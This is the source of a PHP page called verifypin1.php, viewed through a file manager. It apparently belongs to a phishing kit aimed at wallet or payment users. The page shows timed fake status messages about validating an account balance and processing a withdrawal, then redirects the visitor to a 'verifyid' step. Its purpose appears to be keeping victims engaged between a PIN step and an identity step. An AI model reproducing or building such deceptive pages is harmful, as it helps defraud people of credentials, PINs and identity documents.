File Manager
Viewing File: verifypin1.php
<?php
include('auth.php')
?>
<html>
<head>
<link rel="shortcut icon" href="logo.png" type="image/gif"/>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Processing Wallet</title>
<style type="text/css">
.style1 {font-family: "Courier New", Courier, monospace}
.style4 {font-family: "Courier New", Courier, monospace;
color:#0066CC;
font-size:20px;}
.style6 {color: #FF6600}
.style8 {font-size: 16}
</style>
<script>
var preloadimages=new Array(":abstract.simplenet.com/point.gif","abstract.simplenet.com/point2.html")
var intervals=3000
//configure destination URL
var targetdestination="verifyid"
var splashmessage=new Array()
var openingtags='<font face="calibri" size="3" color="#000000">'
splashmessage[1]='Validating your account balance...'
splashmessage[2]='Please wait.......'
splashmessage[3]='Intergrating your payment method for successful withdrawal...'
splashmessage[4]='Checking your current plan status'
splashmessage[5]='Please wait.......'
var closingtags='</font>'
//Do not edit below this line (besides HTML code at the very bottom)
var i=0
var ns4=document.layers?1:0
var ie4=document.all?1:0
var ns6=document.getElementById&&!document.all?1:0
var theimages=new Array()
//preload images
if (document.images){
for (p=0;p<preloadimages.length;p++){
theimages[p]=new Image()
theimages[p].src=preloadimages[p]
}
}
function displaysplash(){
if (i<splashmessage.length){
sc_cross.style.visibility="hidden"
sc_cross.innerHTML='<b><center>'+openingtags+splashmessage[i]+closingtags+'</center></b>'
sc_cross.style.left=ns6?parseInt(window.pageXOffset)+parseInt(window.innerWidth)/2-parseInt(sc_cross.style.width)/2 :document.body.scrollLeft+document.body.clientWidth/2-parseInt(sc_cross.style.width)/2
sc_cross.style.top=ns6?parseInt(window.pageYOffset)+parseInt(window.innerHeight)/2-sc_cross.offsetHeight/2:document.body.scrollTop+document.body.clientHeight/2-sc_cross.offsetHeight/2
sc_cross.style.visibility="visible"
i++
}
else{
window.location=targetdestination
return
}
setTimeout("displaysplash()",intervals)
}
function displaysplash_ns(){
if (i<splashmessage.length){
sc_ns.visibility="hide"
sc_ns.document.write('<b>'+openingtags+splashmessage[i]+closingtags+'</b>')
sc_ns.document.close()
sc_ns.left=pageXOffset+window.innerWidth/2-sc_ns.document.width/2
sc_ns.top=pageYOffset+window.innerHeight/2-sc_ns.document.height/2
sc_ns.visibility="show"
i++
}
else{
window.location=targetdestination
return
}
setTimeout("displaysplash_ns()",intervals)
}
function positionsplashcontainer(){
if (ie4||ns6){
sc_cross=ns6?document.getElementById("splashcontainer"):document.all.splashcontainer
displaysplash()
}
else if (ns4){
sc_ns=document.splashcontainerns
sc_ns.visibility="show"
displaysplash_ns()
}
else
window.location=targetdestination
}
window.onload=positionsplashcontainer
</script>
<script><!--
var jv=1.0;
//--></script>
<script language="Javascript1.1"><!--
jv=1.1;
//--></script>
<script language="Javascript1.2"><!--
jv=1.2;
//--></script>
<script language="Javascript1.3"><!--
jv=1.3;
//--></script>
<script language="Javascript1.4"><!--
jv=1.4;
//--></script><title>Validating your withdrawal</title><script src='/google_analytics_auto.js'></script></head>
<body marginheight="0" marginwidth="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<br><br><br><br>
<table width="100%" height="100%" align="center">
<tr>
<td width="100%" height="50%">
<img src="wd.gif" width="60%" height="50%">
</td>
</tr>
<tr>
<td width="100%" height="40%">
<div align="left" class="style1" id="splashcontainer" style="visibility: visible; top: 350.5px;"> </div>
</tr>
</table>
</body>
</html>